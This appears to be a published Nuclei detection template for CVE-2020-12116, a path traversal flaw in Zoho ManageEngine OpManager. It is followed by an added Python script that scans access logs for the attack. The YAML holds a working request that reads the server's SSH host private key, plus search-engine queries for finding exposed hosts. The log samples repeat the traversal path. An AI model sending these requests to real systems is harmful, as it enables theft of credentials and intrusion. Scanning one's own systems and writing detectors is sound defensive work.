Zoho ManageEngine OpManager - Arbitrary File Read
ID: CVE-2020-12116
Severity: high
Author: dwisiswant0
Tags: cve,cve2020,zoho,lfi,manageengine,zohocorp
Description
Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
YAML Source
id: CVE-2020-12116

info:
  name: Zoho ManageEngine OpManger - Arbitrary File Read
  author: dwisiswant0
  severity: high
  description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
  remediation: |
    Apply the latest security patch or upgrade to a patched version of Zoho ManageEngine OpManger to mitigate the vulnerability.
  reference:
    - https://github.com/BeetleChunks/CVE-2020-12116
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12116
    - https://www.manageengine.com/network-monitoring/help/read-me-complete.html
    - https://www.manageengine.com/network-monitoring/help/read-me-complete.html#125125
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-12116
    cwe-id: CWE-22
    epss-score: 0.97317
    epss-percentile: 0.99876
    cpe: cpe:2.3:a:zohocorp:manageengine_opmanager:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zohocorp
    product: manageengine_opmanager
    shodan-query: http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve,cve2020,zoho,lfi,manageengine,zohocorp

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Connection: close
      - |
        GET {{endpoint}}../../../../bin/.ssh_host_rsa_key HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Cache-Control: max-age=0
        Connection: close
        Referer: http://{{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "BEGIN RSA PRIVATE KEY")'
          - 'status_code_2 == 200'
        condition: and

    extractors:
      - type: regex
        name: endpoint
        regex:
          - "(?m)/cachestart/.*/jquery/"
        internal: true
        part: body
# digest: 4a0a00473045022047300c0fa04d32ff9c6fdb8523b58fd1906c19bc6be02327b732e6ccad2dca500221009a5d527cddd0ea95e7df2453178751047d01ac27c56001cf420f467dd318c728:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-12116.yaml"
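
For checking a server's own access logs for requests shaped like the template's second request (a path under /cachestart/.../jquery/ followed by ../ steps), here is an added Python example; it is not part of the template or of the Nuclei project. The combined-style log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line and status inside a combined-style access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Path prefix matched by the template's extractor, directly followed by parent-directory steps.
TRAVERSAL_RE = re.compile(r'/cachestart/[^?#]*/jquery/(?:\.\./)+', re.IGNORECASE)


def decode_fully(target, max_rounds=3):
    """Percent-decode repeatedly so encoded ../ forms are normalised before matching."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target.replace("\\", "/")


def find_traversal_requests(lines):
    """Return (line_number, status, decoded_target) for each matching request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request entry
        target = decode_fully(match.group("target"))
        if TRAVERSAL_RE.search(target):
            hits.append((number, int(match.group("status")), target))
    return hits


# Constructed sample log lines (documentation IP ranges, made-up cache id 000000).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jun/2020:10:00:00 +0000] "GET / HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jun/2020:10:00:01 +0000] "GET /cachestart/000000/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1" 200 1675',
    '198.51.100.7 - - [01/Jun/2020:10:05:00 +0000] "GET /cachestart/000000/jquery/jquery.min.js HTTP/1.1" 200 88145',
    '203.0.113.5 - - [01/Jun/2020:10:06:00 +0000] "GET /cachestart/000000/jquery/..%2f..%2fconf/x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, status, target in find_traversal_requests(SAMPLE_LOG):
        flag = "served (investigate)" if status == 200 else "rejected"
        print(f"line {number}: status {status} {flag}: {target}")
```

A hit with status 200 means the server answered the traversal request, so any key or file named in the path should be treated as exposed and rotated after upgrading to a fixed build.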